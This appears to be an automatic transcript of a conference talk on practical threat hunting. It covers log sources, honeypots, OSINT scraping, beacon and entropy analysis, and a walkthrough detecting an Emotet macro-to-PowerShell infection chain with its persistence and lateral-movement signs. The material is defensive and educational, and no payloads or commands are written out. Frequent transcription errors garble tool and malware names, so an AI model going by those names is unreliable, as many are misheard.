Threat Hunting by Dhruv Majumdar

thank you thank you so I'm gonna try going over the first ten slides real quick cause of the time constraints ah but to give a short overview I really like Jason's talk which was the passive and active Deanna active attacks I was kind of worried how much can I explain in the 45 minute that I got today and but that talk really paved the path I would say so try to keep that talk in mind while I go through my slides over here and I'm gonna try to fly through the first ten slides really quick cuz they're pretty much the 101 that why am I doing this talk so to get started my Who am I thread hunting basics recipe

for what's needed to do a proper thread hunt a tack life cycle why we really like miter attack framework for people who do not know what might write that framework dive in start looking into it really good platforms to give you a start of what vectors you need and how you can attack those vectors if you are looking for those after that there is a small attack scenario that I made it in such a way that I can talk to people who are getting into the security and also it's kind of an easy walk through for people who have been in the security industry and doing what we try to preach that this is the right way of doing it

there is no really right way and then it's just trying to see whose probability is better to detect that something is happening currently I work for individual proms I'm out of the Toronto office and I actually managed their security platform of threat detection and response I had a good luck of getting started in my career I was working with in bridge moved with Splunk all the structure on the security cause that's something I just got stuck I don't really know how and why but that's something I'll just love doing what from that as for hobbies goes I love doing photography drones and play a little bit of guitar and piano sometimes I leverage my drone to do recon activity as well so

you guys get my drift so before I get started I just wanted to get in and say what do we actually understand by Twitter hunting and the reason I named my presentation not just for hunting and added that extra word called practical the reason being a lot of the people a lot of the talks I have been to or attended I've seen people giving talks about Twitter hunting and what needs to be done and usually they tend out to be something of a strategy a lot of the times we miss out why are we talking about hunting what's the benefit of using this can I start doing this as of today in my house and then can I do

it for let's say a packet size or an environment that's about three terabytes a day all right and the answer is yes it's possible you can do it for more than three terabyte a day and just by using open source tools and if you are a good programmer you can just run the whole show yourself so as the definition goes proactively and iteratively looking or searching through environment to detect and isolate threats that evade the existing security solution I really like this definition not going to go into who actually first told the definition and stuff like that but what this actually shows is that we have been using AVS or some kind of protection mechanism or

solutions or products or appliances in our company nor how's friends please name it but you still get attacked you still get breached you still get into trouble or you still don't have and an entire eyesight of what's going on in your network so it's not that the traditional sock is not doing their job correctly what I feel like is there is a missing gap that's where threat hunting or trade hunters comes in is try to breach the gap the problem with the sock or the or the problem that I personally fuel that is traditional sock is it's always proactive it's it's not really proactive as far as threat hunting comes but it's proactive in the nature it's

always driven by a product or a vendor or what's being taught to you it's not what's needed or what needs to be done so that's why I tunnel out that kind of line that out is that it's basically signature-based most of the time and it's alert driven so what ends up happening is the actual stock analysts their job becomes a rather you know reactive job than being proactive the concept and the mindset mindset kind of changes when you start thinking about threat hunting that's because as a threat hunter I think the first thing that we preach is you need to understand that there's always gonna be an hacker they're always gonna be a breach there's

always going to be some kind of things that you did not thought of the hacker just needs enough motivation and probably money and other reasons but it's always possible it's always going to happen your part is how can you contain that after it has happened so as a threat hunter your job is to find things that stands out sticks out and is not normal so thus bringing on it's a team effort that's that's why I kind of have this light over here it's a team effort where you need people who come from different mindset different experience and has walked the different paths in the library when I talk about red team's over here these are not but

I'm not talking about pen testers and talking about actual people who notes to infiltrate do a proper infrastructure or ot Red Team engagement it's not a scanner I'm not looking for scanners or people who can just run a button and say yeah I did a pen test this is the vulnerability that's not untaught that's not what I'm talking about people who knows and can strategize how you can infiltrate a company how you can go to our objective with the least amount of noise possible if the company is really well protected how can you go against the CISOs and DPS and find enough details to go in from some other areas so the strategy mentality is very

important apart from that differ digital forensics and Incident Response this skill is very needed when you are analyzing host-based data or network based data as I come on the next few slides you will see why they become more important the blue team over here which I talked about is also not the regular stock that we that I have seen or we have come across which is there is an alert that triggered Oh take a look as to what's going on right the blue team that I talked about here is people who have the capability and experience to look through data's and can figure out that this is not normal and when I talk about not normal I'll come back to that later

on the normal for every client that you have or every company you work for will change based on what kind of mechanisms they are using what kind of procedures they're using what kind of Tolerance they're using and what kind of appliances they're using in the network a very basic example can be is your company blocking against ads I'll come back to that Todd later in the slides again threat in tow is very important and plays a really really crucial part in the entire engagement because if you don't know what to look for you're not looking for anything thus it can be a threat hunting team or what I like to say is everyone in this room at

some point needs to understand all this fueled really good and then you become a threat hunters we are really looking for people who can do threat hunting all by themselves and do the entire team's job it's not easy but it's doable so before I go into more scenarios what do we understand and how do we leverage the threat hunters like yeah now we have hired a bunch of three hundreds they're really good if you are not collecting the right logs you are not looking for the right things that entire process just is as good as you know for pouring it down the drain so the logs that you really want to look at is bro snort

mohawk proxy logs just kind of curious how many people here can share the data on that is your company is probably doing web proxy just raise your hands if you are allowed to if not that's fine but to intercept HTTP traffic web proxy logs really important right these logs play a very vital role as to what's needed we were talking about phishing right phishing if you are not taking care or you're not ingesting your mail server logs don't really know what you're looking at yeah you can probably plug in a device and that's gonna work based on signatures if something already happened but usually with bigger clients if the attacker is really motivated they're not

going to use anything that already has a stone signature it's going to either use something that's polymorphed or that's not out in the market or it's not out for script kiddies as I called it for whose data there is a tons of data a lot of work has been happening Windows Event log system on all of the new system and I don't know how many here have been playing with this one that the new ones it's just amazing right no one okay but start looking into system on it's really amazing it literally works with The MITRE framework you can literally categorize where what's happening and how it happened Google Rapid Response another great tool at monitor your hosts

for Linux based right what you do with Linux well there is no security I haven't mentioned that name over here but there's no security as well as osek and audit d turn those on you have enough data to look into your Linux boxes a lot of the times host bit detection gets real tough when it's talking about SCADA Network cause of all the horror stories probably a lot of people you know you turn on system on you might get a blue screen you turn on something else you might get something else it doesn't work the CPU utilization just increases and people don't like it right that's where bro comes in bro please look it up I would really

encourage people to start looking into bro it's a framework dedicated to do network analysis it's an analytic platform once you understand bro data I think you are already halfway to becoming a 300 it literally has parsers to do a lot of protocol parsing and actually looking into what needs to be looked at and when you talk about having complete monitoring of your environment bro Moloch snort surah Cara are your best friends moving on to the next slide over here the actual skills that I like to leverage out of my team first if people who have worked with hosts datas and maybe working incident response the knowledge that they bring onto the table is how do I detect there

is a persistence mechanism going on a code has been executed in a box or privilege escalations happening or some kind of an exploit right as far as network analysis goes on lateral movements c2 command and control beacon pattern analysis and payload deliveries and different stages of payloads nowadays a newer malware they tend to like to use not just one payload mechanism usually there is two or three and they change I'll talk about I'll talk about the beacon pattern in one of my slides just to give you guys a cool cool picture as well as it shows what you can achieve when you are looking at flow data the the same talk passive and active monitoring great talk by the way

by Jason so I'll show you how to do beacon pattern analysis and how it helps you in your day-to-day job threat intelligence sticks and taxi these are the two names that will pop up every time we talk about ready intelligence or threat gathering sticks gives the structure as to what your data needs to look like taxi is the way you transfer peer-to-peer that data that you are now generating a lot of the data there is a project called stats look it up it's an open source project you can have it running in your home lab environment just to see how the data actually looks like and how it can be leveraged active defense and OSINT I'm gonna mix them

together for different reasons but active defense a really good way of doing that is having honey pots that sit in your environment and in strategic locations which only your security team is supposed to have access to anyone else having access to that box our trigger pops up because they're not supposed to know about this they're not supposed to interact with this box something's happening means you need to look into it I would advice for people looking into honey pots and something that needs to be aware of with this crowd is a lot of the honey pots are there online and they're like one-click deployment look into Imogen servers really good tools for learning per not a great tool for actually doing

something on your environment because if I was a hacker I have the same resources I can now fingerprint all these open-source honey pots and it's only gonna take me a second before knowing it's a honeypot and I'm not gonna touch it so itself actually no use try custom making your own honey pots OSINT like OSINT covers a huge field really some good examples I can craft right now is if you are working for a company or you monitor a whole lot of companies and you are responsible for threading tool when I talk about threading - I'm talking about tactical threading tool not the general threading toe so when it comes to tactical threat intelligence what

really matters is how much are you exposed to public by public I mean people who really wants to attack you so Osen covers that face now you have showdown you have census i/o and you have a whole whack of darknet tools that you can use but end of the day what you guys need to understand is yes they are there you need to harness this knowledge so dust comes to coding scripting scraping pasting data scraping dumpster data using census and shodhan to know whoa this IP or this port was not open for my company two days back now it's open what's going on needs to investigate right so and you get an alert literally because it's not manual

it's not possible automation comes in after the people know what to look for oh sink also covers a lot of other fuels that I like to talk about especially from a threat intelligence background is a lot of the times company call and say you know we want to get a threat intelligence work done but you can actually do this yourself very easily with your soft team you don't need too many people one person can do this job which is and it's a question how many people in this hall actually scrapes for dumpster-dives and they know that their passwords has been pawned from different sources right very few I would think but it is possible you can always automate

and script for every time there's a user name password breach that half let's hit a LinkedIn let's say Adobe those goes to a dumpster hackers love spring data around or sharing the information around in their own circle turns out to be either some form of a pastebin encoded form or a dumpster guy or some of the forums or in the dark web scrape these things and now you have a database of all these information stored them wherever you want figure out what will you need how much resource you need and start from just using MongoDB right like that's probably 101 on storing data and looking into it and once you feel okay now I need to do this on a really high

performance and there is time is very crucial you move on to Apache spark you move on to a Hadoop cluster you move on to L stack you move on to Splunk choose your poison but these are very important boy okay yeah so I want to talk about attack lifecycle and this is a mix-and-match from a lot of good attack life cycles that have been already been talked about by Lockheed Martin and different other companies but what I want to show here is that the attack framework and if you are a threat hunter how your lifecycle needs to align up with the red teamers so let's say the attack starts from our recon usually passive active and then it becomes a

delivery mechanism exploits installation c2 privilege escalation lateral movement that's already not a good sign in your environment if you're seeing that objective right whatever the objective be as a threat hunting guy or from a background of threat hunting your priority is or we I like to say it we start the morning off by saying there is already a breach let's find out if we can catch the breach and close it as soon as it can it as soon as it's possible right so we come from a mindset that we do not think that Oh everything's all awesome it's sunny all the time right we come from a mindset where we think there is already a breach

let's contain that so from a defensive perspective your start off ground is as similar to the same red teamer who's doing the work your work is to scrape all the data possibly visible somewhere in the world if it's available to the hackers it's better be available to you and your company right and then take actions against those and these are all Priority One if you and these are literally I like to skip all the the cool stuff that companies make like the SaaS and working with different teams and this and that when you see an issue pick up the phone no your guy whom to call get the work done that's priority second is analysis

like you analyze if it back to the whole priority and SLA is right you analyze if this is priority one two three can take up to a month can take up to a week to get this sorted out but that's your decision or your team's decision to make this judgment call and get it fixed if they don't if they don't work on it demonstrate what a red teamer will do that's why you need red teamers in your team repeat not pen testers triage the problem investigate and contain your your main interest is to contain when and when there is a breach happening you know there's a breach happening can I contain that or can I already put a

sandbox around it so that now I can monitor what the red team was trying to do but he doesn't know that that's going on there different approach of what you can do at this point back to this last circle over here as I mentioned know your clients know your terrine as I like to say cybersecurity is the new form of warfare people don't have time to press buttons here and there for actual military stuff this will be the new warfare if it not hasn't been yet but if it's a government-sponsored if it's an ATP you better know your client cause they're gonna look for information that's available job postings gives out a lot of software information and

metadata every time you have a post that's out in the market I can now grab the computer name your name what was your domain and all these informations very easily I don't even have to waste more than two minutes on this after that so you create your theories now these are my hypothesis this is the way the attacks going to happen now that you also investigate with the dark net recon work in Orson activities and now what you want to do is your hypothesis has now been crafted now you start looking for what is available in your network is any of your hypotheses that you figured might be happening is it happening if it's not

keep digging right until you have an answer that yeah you are foolproof protected keep digging and obviously this is a very tedious job don't do it every day the same thing use and leverage products are out in the market every time hypothesis becomes it needs to be enriched with the data and the trade intelligence platform you're leveraging so that the next time it's actually automated you know you're not running the same searches every day by yourself it just doesn't work so that part is something a lot of the companies I personally feel Phil is the last part is now you have good people with experience you probably are being bottlenecked with the product product comes second people comes first have

experience people train the people that you have asked them what they need to get the work done right then figure out what product you need to use don't know why it's clicking twice but know that for the longest time I was talking about what things we need what logs we need and what gives the thread hunter well basically what makes a thread hunter you know get his job done now I'm showing when a 800 gets his job done there are some cool screens like this that pops up and it's pretty neat when you when you get the job done cause no one's gonna give you a pat at the back but when you go back home you will be like yeah I did

something good today right so something here that I want to talk about is a beacon pattern analysis for this you definitely need bro log and a lot something else like there are streams or spawn streams Wong has written that but you need something that looks into flow data there are so right now we are looking at HTTP events or HTTP flow if you don't have web proxies on your your company company why are it's not deployed properly you can also leverage different technologies and fingerprinting mechanisms like ja3 for HTTP you can also come up with your own fingerprint mechanism that you have tried in own lab and you know what when is someone running a reverse shell

meterpreter over https if someone's doing an IRC outbound these are all possible to fingerprint and your data will look like this so this case one morning we just started off the work again we look at the screen and this is one of our time that actually happened in the month of April a month of August actually and we were looking at this and the blue line the one you guys see is the last 24 hours the red line is actually the last day how it looked like and the green line was how it looked on a cluster made it's a it's an AI that we run behind how it usually looks like right with this pattern right here we

were like well this is not normal to us because we've been monitoring the network for a long time this pattern of that the blue line over here does not look right instantly we got triggered obviously and even without someone looking into the dashboard we will get triggered on an alert that ok something's not right going on with HTTP flow look into it right this was actually related to a conflict configure warm basically if you guys don't know what that is I would suggest look into f-secure they did a really nice blog about it it shows about how a configure works and how it makes its way into the environment and why it needs to generate

that pattern and this screen I'm showing about how that pattern actually got generated so right here you're seeing at a DGA which is domain generated algorithm and not only config or actually uses this technology or this method it's being used by a lot of ransomware out in the market and this is a way they talk back to their c2 so our next step was from that previous screen we went to ok since we have the data what kind of DNS queries were being made and what kind of HTTP requests were being made let's try to look into that and we came across this at first we were like Wow okay looks like completely random but if you look close enough and you

have all your information comes back to it intelligence at this time if you just even copy pasted one of these domains and you actually went on to any of your Intelligence Platform let's I'm not gonna name the platforms but you go there plug it in it's not gonna give you any reference it wouldn't tell what it was because this was very new at that time but since we were scraping pastebin and we have our own honey pots deployed across all the continents we can think of over 6,000 of them and we capture all those data into our 13 trillions platform from these two sources mainly pastebin because there was a really nice research done by one of the Chinese

intelligence and he decided to place that on pastebin thank God we basically started looking up with this key witness queries and we basically would trace it back that okay this was an infection this is configured next thing is you know phone up the guy who goes with this section called him to pull the plug if they want to run any kind of dissection or any kind of forensic song this box tell them not to restart the box cuz that end up happening a lot of the time and you actually lose valuable information a lot of these worms they tend to be not on the disk they tend to be on the memory so you restart the box

means you're losing what was actually happening also a lot of the times the threat hunters we really need tools to guide us over the day or to make our life easier or else we the work will just eat up every individuals time and we won't be able to monitor multiple clients over the day right some of the tricks that we use is basically this one over here we use DNS entropy and HTTP entropy what they are basically in another way of seeing it is we leverage Shannon entropy to actually come up with okay this one does not look like a valid host name or a valid query it just does not seem right and there are always a

lot of false positive depending on what kind of environment you are in a lot of this HTTP requests will like the one that's being shown here is actually a Google ad so we tend to monitor ad cause a lot of time if I was a hacker you already have a network which is the ad network that's infiltrating anyways I'm just gonna buy I'm gonna just make a fork off that same network and try to infiltrate your company because you are not blocking ads so we tend to monitor what's going on - ad network as well and the recent spike would be Chrome extensions and other browser extensions also those are very easy detectable with this technology

right here or this way of looking into data I wouldn't call it a technology but it's it's a way of visualizing the data the second part if you guys can see I don't know if you guys can see it well enough but the HTTP entropy the second part right here you see a whole gibberish right if you look into this kind of data over and over again I can't really share from where I got this data but it ended up being a vending machine that was in a schedule and that shouldn't have been that's all I can give and when you are looking at this data stream it's actually if you have been looking into this kind of data over

and over again at this stage you will know that this is a byte stream data being transferred outbound from your wherever the location is definitely needs to be looked at as what's the see - what's happening how did it get in for this case I can share that yeah this was a vending machine doing this which was not supposed to do this after that this is the walkthrough that I was talking about and I'm gonna try to go as soon I'm gonna try to cover this area as quickly as possible going through no harm done by timewise but I think I can manage so the walkthrough is there actually a simple one that I got for so that people

who are starting out in the industry can understand this walkthrough very well a simple case of phishing and detecting it and before the phishing is the guy who's doing the fishing reaches its objective how you can trap it contain it and resolve it so that it does not become a problem right for that what bottlenecks are what are the pivot points you need to know you need to see the data that shows process executions PowerShell logging and email logs so as far as hosted is considered for this particular case only thing you need to leverage is actually system on data windows event logs mail logs and some sort of a network stream data so again back to Bro or some kind

of a stream so based on this this was actually a case for a motet for people who do not know what a Motorhead is I would strongly suggest again research the only way this field is gonna make your life easier and make it better is the more research you do without the hard work nothing comes for free that's what I usually tell people for a honeypot for the the hunt hypothesis searching for programs launching VB PowerShell or command-line arguments that's my force hypothesis so I need to start looking for did anything happen in that box that had been running a VB script a command line or a power show execution happened on that box are we

seeing any kind of a situ that's going out of that box somewhere right at that point that's my hypothesis and setting up persistence for persistence as days go by hackers are coming up with different different ways but I'm gonna I'm gonna go over that slide and show you guys what are the key methods a lot of the red teamers tend to use and what have been in the use for a while but now they're changing their tactics also for this particular case we had an unknown file hash so basically what I'm trying to say here is let's say you do get a hash probably none of the vendors will know also the same time if your favorite

links becomes a virustotal or something very similar you go plug in the hash you have no information what you're looking at okay now this material I doubt how many eyes can see from the back what's written all over the screen but my plan is that when you guys take back this this presentation you get a chance to look over this entire process this is a walk down or walkthrough of what entirely I'm trying to explain right now with you guys it's in this diagram it's given with all the details to make it really quick and easy on that side we found that this is emoted based on pastebin data and also we actually confirmed that that ye

health that we see here is actually the delivery mechanism that the new emoted was using apart from that we also found that the execution tree which basically was a word macro it leveraged command command line with obfuscation and after that it moved on to actually doing the next stage of the payload which was leveraging powershell script I was a base encoded base64 encoded partial I'm gonna come to that slide next but also we were able to get all the SI toos that it was communicating outbound with and also you know the the sha-256 for helping out and sharing the data to other twenty until people who are getting our 30 intelligence features also since we also deploy snort or

sarikaya in our environment we obviously get any kind of IDs matches that happens so for this particular case we did get auto open macro and terse named file that's possibly hostile but but the kill chain of how it happened was there was an email that was sent even though they were using a really good vendor known to block a lot of these did not block it next thing we know the user does click on macro and that fancy picture I showed in the last screen from there it actually leveraged Explorer from there it went to win word exe that launched CMD you CMD to call power show and power shall actually downloaded the second stage of the payload that was seven to

nine exe the seven to nine exe actually copies itself in multiple places and it then changed it name to T voluntarily exe and T voluntary dot exe is responsible for doing all the other stages that become a cross which is persistence mechanism if it was in case of this is an emoted if this was an NG rat the T vondre would be leveraging that and lateral movement in the network but the way we got to know I'm gonna come back to this slide after I'm done with the this light where is my slide that I want to show okay so here is a small breakdown of what the power shall look like and the reason I give this out to

you guys is when you guys take back home it's pretty easy dissecting a base64 encryption power so once you have it and we also saw that the seven to nine exe and the T voluntary exe they also shared the same hash that's confirming it was the same exe that just copied itself in a different folder or different folders for this particular case the power soul after we decoded it we saw all the the actual communicating servers that it was leveraging and at this point you know you just pick up the phone call the right people get those blocked and also since you are monitoring now a lot of different clients or the entire company you might want to do is plug these in

into your search query and see if there's any other box that might have been infected somewhere else cuz people like to bring in the box and take out the box right laptops phones whatever did they get infected somewhere else and they came into the office if they are and they are actually online right now and they're talking we have another detection and work on it get it fixed so now I'll go back to my previous screen okay so with the note with the network based data what leverage what monitoring you can you can leverage with network based data right so we saw that a download actually happened from that destination IP right here I'm not gonna

read that out but you guys probably can see that at this point sometimes what we like to do is go after that versary so we would probably start doing a red teaming engagement against these people who are doing this just for fun also at this point you can see that the Mozilla extension that's being used so the Mozilla 4.0 is an older user agent version it's not the latest one and also we get other details as this is a msword status quos well obviously 200 and also that alert that we detected on with sis Mon data and even before we did a deep dive just looking at the system own events what happens and you can look at these events

in various different forms but what we tend to do is just see what's going on in that hour in our network based on segments of different IP e sections and subnets so when we did that scan we saw that okay there is a file created and a registry value said oh that's not a good sign brings onto the next stream so we started doing a deeper dive we see that okay there was a command line that was alpha skated not encoded it was just office kated the reason hackers tend to use office keishon against encoding is because it's a polymorphic in nature you can always keep on changing the same code over and over again with

polymorphic obfuscation and you can reuse this same code over and over again thus the command line which we saw okay this is the command line what called the command line was the parent image right here at the bottom if you see that okay it leveraged of the Windward exe and the command line was called and obviously the image that was called is the command command line after that we see that okay the command line after it ran it actually called the power show and which was encoded and which did the rest of the work I already went over this screen with you guys [Music] so as for disk activities considered also true siscon you can gather what

actually happened on that box so we actually did see that okay yep the 79 exe was created and after that creation the T voluntary was created so forth those are for let's say you need to submit a report with someone as to what exactly happened these become very useful evidence that you need to submit apart from that again back to the the network when the C 2 was actually happening so you still see that okay it was reaching out to a destination IP of I kind of highlighted that and the process that were using is the power show back to persistence the the thing I wanted to talk to you about persistence what you guys need to look out for is

usually hackers will tend to use or leverage Ron keys which is basically setting up registry values or registry keys services scheduled tasks off line office templates dll's access features beacon patterns and out IDs and lateral movement now these are all that is trackable once you have a very good visibility of your network and these are usually what the advisories will be trying to use and the first three I call them the old-school ways hackers love to use those the more and more new members are coming out of worms are coming out they don't tend to even exist on the disk it's probably on the memory so beacon pattern becomes very important they love to do an API injection thus

infiltrating our dll without even being part of the disk that's so you can track those changes and obviously lateral movement you will see a box trying to communicate with multiple boxes running so brings onto the well this page actually talks about the registry that I was talking about the wrong keys so we actually see that T voluntary did registry implementation over here for its persistence mechanism next slide I talked about lateral movement don't know why I can't go to the next slide

technical difficulties guys but yeah lateral movements for lateral movement the things that you can leverage your in your monitoring is is there a recon work happening is there a port scanning happening is there a power show exact that's running off that box where it's not supposed to run is there an RDP session going on or is there actually a PS remoting happening right after that there will be probably I tend to do a zone transfer or DNS poisoning attempts or they can leverage something called the bloodhound and with a really awesome plugin that was recently bought a few years back that was done there was a add-on that happened that's called the angry puppy it literally does LDAP enumeration

giving out most of your details about the interactive directory right so those are the signs that you can look for but make sure you contain the data before this step happens this is already too late but still need to know when this thing happens what to look for what you also expect to see is through system owned or Windows data that anonymous user activities service logins LDAP traffic high count of one to many connections one box trying to do RDP sessions with multiple other different box or trying to scan different other boxes from that same box which will become which actually is a pivot case that all of the time we actually alert on and start looking into that why is

this box from the HR department trying to get into a box that belongs to the monitoring department or some other department but when you know what your baseline is these kind of detections can be tracked and monitored very easily but again back to what data types am I gonna leverage off that that is going to allow my threat hunters to do this job system on data windows data bro log I think that is pretty much that brings us to the end of the presentation the reason I did this presentation was I believed in the cause that people needs to learn understand what this is rather learning our product works people need to understand how and why someone's doing something the

question is not that why are they doing it to us the question is I can do it so I'll do it that's usually the argument for a hacker who's trying to do something bad to your organization or you or your parents right just pick whatever is the different scenarios but the thing usually happens very similar fashion so we have a huge and I repeat we have a huge deficiency of people who knows how to look into this kind of information and do the work right when I actually go into public or are going to a workshop I actually see a lot of young people and they're all very you know they're they're I was young at like only just

few months or a few years back and basically they all loved to get into the field but they don't really know what to look for how to get started what can we leverage how much can be learned just by doing stuff in your own home lab environment it doesn't take much it doesn't even take a big server to run a lot of the stuff to just start running actually bro made Raspberry Pi port Splunk made a portable portable version for running in Raspberry Pi so you can run this entire scenario for your home in a Raspberry Pi and monitor your home and learn at the same time while I was monitoring my home a good

scenario was I actually I buy stuff so that I can break them so I bought out a whole pack of Samsung lo ble devices and basically their home oh my arts that's what I like to call them but they serve different purposes like their toasters or their music players or their speakers and Smart TVs you'll be surprised how much data goes to south well goes to South Korea from your house when you run all these now ten god it's not the other end of the Koreas but it's South Korea for that case but a lot of cool and interesting things that you can find from just looking into your home network and you can leverage the Raspberry Pi

cause your home is probably about only 10 or 20 or 30 or 50 devices strong obviously you can do the same for environment so there needs to be a way you can so the question comes what you need to look for what you want to accomplish and what agents and what appliances can do this job for you guys just to give a brief history of this conversation few years back I was talking to some people and they told me or what you're saying is is possible in a lab environment it's never possible in an actual corporate environment let me tell you that statement was completely wrong we currently do 10 terabytes of data a day and we run this entire show

24/7 all around the year right so this is possible you just need to figure out what you need what infrastructure you can leverage of what tools you need what what crap you can throw off there's all this crap with any kind of oil that comes in you need to know what you can Creek in and out and only use it for the purpose it was bought for but also for people who are starting out in the industry filled in this security industry I think the three really good platforms that you can learn from a lot is security onions salt and hunting elk hunting with elk are called health there is a great DEFCON presentation for help I would strongly

recommend practice this in your lab environments create your own environments and start doing these to understand security better the more you guys understand the easier it becomes for the security fuel to work and yeah let's work together and let's get the show running so that's all for my presentation and hopefully you guys had something to take back home today you